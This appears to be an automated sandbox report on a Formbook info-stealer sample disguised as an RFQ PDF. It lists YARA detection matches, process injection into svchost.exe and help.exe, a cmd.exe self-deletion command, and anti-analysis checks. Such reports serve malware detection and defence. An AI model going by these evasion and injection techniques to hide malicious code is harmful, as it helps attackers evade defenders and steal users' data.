          Source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: RFQ PC25-1301 Product Specifications_PDF.exe PID: 2940, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 6444, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
          Source: Process Memory Space: help.exe PID: 5132, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/1@12/5
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB37B5 GetLastError,FormatMessageW,0_2_00AB37B5
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AA10BF AdjustTokenPrivileges,CloseHandle,0_2_00AA10BF
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AA16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00AA16C3
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00AB51CD
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00ACA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00ACA67C
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_00AB648E
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A442A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00A442A2
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeFile created: C:\Users\user\AppData\Local\Temp\juvenilely
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: RFQ PC25-1301 Product Specifications_PDF.exeReversingLabs: Detection: 36%
          Source: unknownProcess created: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe "C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe"
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe "C:\Windows\SysWOW64\autoconv.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe "C:\Windows\SysWOW64\help.exe"
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeSection loaded: wsock32.dll
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeSection loaded: version.dll
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeSection loaded: winmm.dll
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeSection loaded: mpr.dll
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeSection loaded: wininet.dll
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeSection loaded: userenv.dll
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeSection loaded: wldp.dll
          Source: C:\Windows\explorer.exeSection loaded: dlnashext.dll
          Source: C:\Windows\explorer.exeSection loaded: wpdshext.dll
          Source: C:\Windows\SysWOW64\help.exeSection loaded: wininet.dll
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic file information: File size 1790464 > 1048576
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: Binary string: wntdll.pdbUGP source: RFQ PC25-1301 Product Specifications_PDF.exe, 00000000.00000003.2332742622.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, RFQ PC25-1301 Product Specifications_PDF.exe, 00000000.00000003.2334998712.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2399691163.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2399691163.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337730554.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334619493.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.4770864197.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000005.00000003.2399183500.000000000316A000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000003.2400905474.0000000003317000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.4770864197.000000000365E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RFQ PC25-1301 Product Specifications_PDF.exe, 00000000.00000003.2332742622.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, RFQ PC25-1301 Product Specifications_PDF.exe, 00000000.00000003.2334998712.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2399691163.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2399691163.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337730554.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334619493.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, help.exe, help.exe, 00000005.00000002.4770864197.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000005.00000003.2399183500.000000000316A000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000003.2400905474.0000000003317000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.4770864197.000000000365E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: help.pdbGCTL source: svchost.exe, 00000002.00000002.2399341941.00000000029C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.2399474583.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2399509273.0000000002C12000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.4769749796.0000000000870000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.4782465999.0000000010C2F000.00000004.80000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.4771639384.0000000003A0F000.00000004.10000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.4770053790.0000000002F61000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: help.pdb source: svchost.exe, 00000002.00000002.2399341941.00000000029C0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.2399474583.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2399509273.0000000002C12000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.4769749796.0000000000870000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.4782465999.0000000010C2F000.00000004.80000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.4771639384.0000000003A0F000.00000004.10000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.4770053790.0000000002F61000.00000004.00000020.00020000.00000000.sdmp
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00A442DE
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A60A76 push ecx; ret 0_2_00A60A89
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417933 push esi; ret 2_2_00417934
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E9AD push dword ptr [D2425A3Fh]; ret 2_2_0041E9CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416B48 push ebp; retf 2_2_00416B63
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409BA9 push ecx; ret 2_2_00409BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D4D2 push eax; ret 2_2_0041D4D8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D4DB push eax; ret 2_2_0041D542
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D485 push eax; ret 2_2_0041D4D8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417D70 push ebx; ret 2_2_00417D7D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D53C push eax; ret 2_2_0041D542
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417D9A push ebx; ret 2_2_00417D7D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032309AD push ecx; mov dword ptr [esp], ecx2_2_032309B6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_029DEB1E push esp; retn 0000h2_2_029DEB1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_029DEB02 push esp; retn 0000h2_2_029DEB03
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_029DE9B5 push esp; retn 0000h2_2_029DEAE7
          Source: C:\Windows\explorer.exeCode function: 3_2_087FCB1E push esp; retn 0000h3_2_087FCB1F
          Source: C:\Windows\explorer.exeCode function: 3_2_087FCB02 push esp; retn 0000h3_2_087FCB03
          Source: C:\Windows\explorer.exeCode function: 3_2_087FC9B5 push esp; retn 0000h3_2_087FCAE7
          Source: C:\Windows\explorer.exeCode function: 3_2_109899B5 push esp; retn 0000h3_2_10989AE7
          Source: C:\Windows\explorer.exeCode function: 3_2_10989B1E push esp; retn 0000h3_2_10989B1F
          Source: C:\Windows\explorer.exeCode function: 3_2_10989B02 push esp; retn 0000h3_2_10989B03
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_034C225F pushad ; ret 5_2_034C27F9
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_034C27FA pushad ; ret 5_2_034C27F9
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_034F09AD push ecx; mov dword ptr [esp], ecx5_2_034F09B6
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_034C283D push eax; iretd 5_2_034C2858
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CB0000 push cs; iretd 5_2_02CB0003
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCD4DB push eax; ret 5_2_02CCD542
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCD4D2 push eax; ret 5_2_02CCD4D8
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCD485 push eax; ret 5_2_02CCD4D8
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCD53C push eax; ret 5_2_02CCD542
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A5F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00A5F98E
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AD1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00AD1C41
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-96893
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeAPI/Special instruction interceptor: Address: 141EF24
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB4430774
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D8A4
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
          Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
          Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFDB4430774
          Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
          Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
          Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
          Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
          Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
          Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFDB442D8A4
          Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 2CB9904 second address: 2CB990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 2CB9B7E second address: 2CB9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 9768
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 885
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 868
          Source: C:\Windows\SysWOW64\help.exeWindow / User API: threadDelayed 9738
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeAPI coverage: 3.4 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 2.3 %
          Source: C:\Windows\SysWOW64\help.exeAPI coverage: 2.3 %
          Source: C:\Windows\explorer.exe TID: 6976Thread sleep count: 9768 > 30
          Source: C:\Windows\explorer.exe TID: 6976Thread sleep time: -19536000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6976Thread sleep count: 173 > 30
          Source: C:\Windows\explorer.exe TID: 6976Thread sleep time: -346000s >= -30000s
          Source: C:\Windows\SysWOW64\help.exe TID: 2544Thread sleep count: 235 > 30
          Source: C:\Windows\SysWOW64\help.exe TID: 2544Thread sleep time: -470000s >= -30000s
          Source: C:\Windows\SysWOW64\help.exe TID: 2544Thread sleep count: 9738 > 30
          Source: C:\Windows\SysWOW64\help.exe TID: 2544Thread sleep time: -19476000s >= -30000s
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A7C2A2 FindFirstFileExW,0_2_00A7C2A2
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB68EE FindFirstFileW,FindClose,0_2_00AB68EE
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00AB698F
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AAD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00AAD076
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AAD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00AAD3A9
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00AB9642
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00AB979D
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00AADBBE
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00AB9B2B
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00AB5C97
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00A442DE
          Source: explorer.exe, 00000003.00000002.4776588202.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348289293.000000000962B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
          Source: explorer.exe, 00000003.00000002.4776588202.00000000097F3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000003.00000000.2348289293.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.000000000973C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws
          Source: explorer.exe, 00000003.00000000.2348802491.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
          Source: explorer.exe, 00000003.00000000.2348289293.0000000009605000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
          Source: explorer.exe, 00000003.00000000.2343445045.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.2343445045.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
          Source: explorer.exe, 00000003.00000002.4776588202.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348289293.000000000978C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000003.00000000.2348802491.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
          Source: explorer.exe, 00000003.00000000.2343445045.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000003.00000000.2343445045.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.2348802491.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040ACF0 LdrLoadDll,2_2_0040ACF0
